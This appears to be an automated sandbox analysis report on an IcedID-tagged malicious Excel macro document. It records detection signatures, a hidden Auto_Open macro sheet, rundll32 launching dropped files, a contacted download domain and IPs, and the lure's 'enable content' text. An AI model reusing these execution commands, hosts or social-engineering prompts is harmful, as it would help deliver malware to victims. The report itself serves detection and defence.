Loading ...

Play interactive tourEdit tour

Analysis Report statistic-2069354685.xlsm

Overview

General Information

Sample Name:statistic-2069354685.xlsm
Analysis ID:403883
MD5:e594ea809c24d81cacae25761ae68a4d
SHA1:c402e78a57d801ee6220aa1e8532e444db22f911
SHA256:d328633005bb0fd39826107193a26f4d6d933fb4f2dfb6f8e4eb48c6eab81df3
Tags:IcedIDxlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: System File Execution Location Anomaly
Yara detected MalDoc1
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 7116 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 4420 cmdline: rundll32 ..\jordji.nbvt1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4780 cmdline: rundll32 ..\jordji.nbvt11,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sharedStrings.xmlJoeSecurity_MalDoc_1Yara detected MalDoc_1Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 7116, ProcessCommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, ProcessId: 4420
    Sigma detected: System File Execution Location AnomalyShow sources
    Source: Process startedAuthor: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 7116, ProcessCommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, ProcessId: 4420

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: statistic-2069354685.xlsmMetadefender: Detection: 18%Perma Link
    Source: statistic-2069354685.xlsmReversingLabs: Detection: 34%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: unknownHTTPS traffic detected: 192.254.233.89:443 -> 192.168.2.4:49732 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.5.2:443 -> 192.168.2.4:49734 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
    Source: global trafficDNS query: name: industrialarttextile.com
    Source: global trafficTCP traffic: 192.168.2.4:49732 -> 192.254.233.89:443
    Source: global trafficTCP traffic: 192.168.2.4:49732 -> 192.254.233.89:443

    Networking:

    barindex
    Yara detected MalDoc1Show sources
    Source: Yara matchFile source: sharedStrings.xml, type: SAMPLE
    Source: Joe Sandbox ViewIP Address: 192.185.5.2 192.185.5.2
    Source: Joe Sandbox ViewIP Address: 192.254.233.89 192.254.233.89
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownDNS traffic detected: queries for: industrialarttextile.com
    Source: jordji.nbvt11.0.drString found in binary or memory: http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://api.aadrm.com/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://api.cortana.ai
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://api.office.net
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://api.onedrive.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://augloop.office.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://cdn.entity.
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://clients.config.office.net/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://config.edge.skype.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://cortana.ai
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://cortana.ai/api
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://cr.office.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://dev.cortana.ai
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://devnull.onenote.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://directory.services.
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://graph.windows.net
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://graph.windows.net/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://lifecycle.office.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://login.windows.local
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://management.azure.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://management.azure.com/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://messaging.office.com/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://ncus.contentsync.
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://officeapps.live.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://onedrive.live.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://outlook.office.com/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://outlook.office365.com/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://settings.outlook.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://staging.cortana.ai
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://tasks.office.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://wus2.contentsync.
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownHTTPS traffic detected: 192.254.233.89:443 -> 192.168.2.4:49732 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.5.2:443 -> 192.168.2.4:49734 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing , i from the yellow bar above " [unDLL X I'"' Once You have Enable Editing ,ple
    Source: Screenshot number: 8Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Cont
    Source: Screenshot number: 8Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? W You are using iOS or
    Source: Document image extraction number: 7Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Document image extraction number: 7Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 17Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
    Source: Document image extraction number: 17Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
    Source: Screenshot number: 12Screenshot OCR: Enable Editing from the yellow bar above I Once You have Enable Editing , please click Enable Co
    Source: Screenshot number: 12Screenshot OCR: Enable Content I from the yellow bar above 0 C' WHY I CANNOT OPEN THIS DOCUMENT? I i i W You ar
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: statistic-2069354685.xlsmInitial sample: EXEC
    Source: statistic-2069354685.xlsmInitial sample: CALL
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: statistic-2069354685.xlsmInitial sample: Sheet size: 22188
    Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="5" lowestEdited="6" rupBuild="9303"/><workbookPr filterPrivacy="1"/><bookViews><workbookView xWindow="8595" yWindow="0" windowWidth="4020" windowHeight="3120"/></bookViews><sheets><sheet name="Sheet1" sheetId="9" r:id="rId1"/><sheet name="Sheet2" sheetId="4" r:id="rId2"/><sheet name="Sheet3" sheetId="7" r:id="rId3"/><sheet name="Sheet4" sheetId="8" r:id="rId4"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet2!$AO$115</definedName></definedNames><calcPr calcId="145621"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
    Source: classification engineClassification label: mal84.troj.expl.evad.winXLSM@5/14@2/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{7A067E03-BE75-4C58-9B2F-DDBC41F6F51E} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
    Source: statistic-2069354685.xlsmMetadefender: Detection: 18%
    Source: statistic-2069354685.xlsmReversingLabs: Detection: 34%
